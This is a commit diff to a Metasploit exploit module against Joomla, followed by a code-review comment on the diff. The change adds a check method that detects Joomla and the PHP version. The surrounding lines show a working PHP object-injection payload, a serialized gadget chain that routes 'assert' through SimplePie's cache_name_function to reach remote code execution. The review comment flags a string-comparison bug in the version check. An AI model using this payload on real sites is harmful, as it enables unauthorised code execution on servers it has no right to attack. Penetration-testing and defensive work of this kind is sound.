Add a check for joomla
parent
e4309790f5
commit
b9b280954b
|
@ -49,6 +49,39 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
res = send_request_cgi({'uri' => target_uri.path })
|
||||||
|
|
||||||
|
unless res
|
||||||
|
vprint_error("Connection timed out")
|
||||||
|
return Exploit::CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
unless res.headers['X-Powered-By']
|
||||||
|
vprint_error("Unable to determine the PHP version.")
|
||||||
|
return Exploit::CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
php_version = res.headers['X-Powered-By'].scan(/PHP\/([\d\.]+)/i).flatten.first || ''
|
||||||
|
vprint_status("Found PHP version: #{php_version}")
|
||||||
|
|
||||||
|
if php_version > '5.3'
|
||||||
|
vprint_error('This module currently does not work against this PHP version')
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
res.get_html_meta_elements.each do |element|
|
||||||
|
if element.attributes['name'] &&
|
||||||
|
/^generator$/i === element.attributes['name'] &&
|
||||||
|
element.attributes['content'] &&
|
||||||
|
/joomla/i === element.attributes['content'].value
|
||||||
|
return Exploit::CheckCode::Detected
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
def get_payload
|
def get_payload
|
||||||
pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
|
pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
|
||||||
middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
|
middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
|
||||||
|
@ -58,7 +91,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
|
return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def print_status(msg='')
|
||||||
|
super("#{peer} - #{msg}")
|
||||||
|
end
|
||||||
|
|
||||||
|
def print_error(msg='')
|
||||||
|
super("#{peer} - #{msg}")
|
||||||
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
if check == Exploit::CheckCode::Safe
|
||||||
|
print_error('Target seems safe, so we will not continue.')
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
print_status("Sending payload ...")
|
print_status("Sending payload ...")
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
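Review bot: The version gate in `check`, `if php_version > '5.3'`, compares two strings, so the result follows character order rather than version order: `'5.3.1' > '5.3'` is true, while `'10.0' > '5.3'` and `'' > '5.3'` are both false. The empty case arises when `X-Powered-By` is present but carries no `PHP/` token. A wrong `Safe` here is false assurance, because `exploit` stops on it and anyone reading the check result will trust it. Compare parsed versions instead, e.g. `if !php_version.empty? && Gem::Version.new(php_version) > Gem::Version.new('5.3')`, and add a comment above the test naming which releases the cut-off is meant to exclude. The value comes from a banner the server can suppress or rewrite, so the method's comment should also say that `Safe` on this branch is banner-derived.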
|
||||||
|
|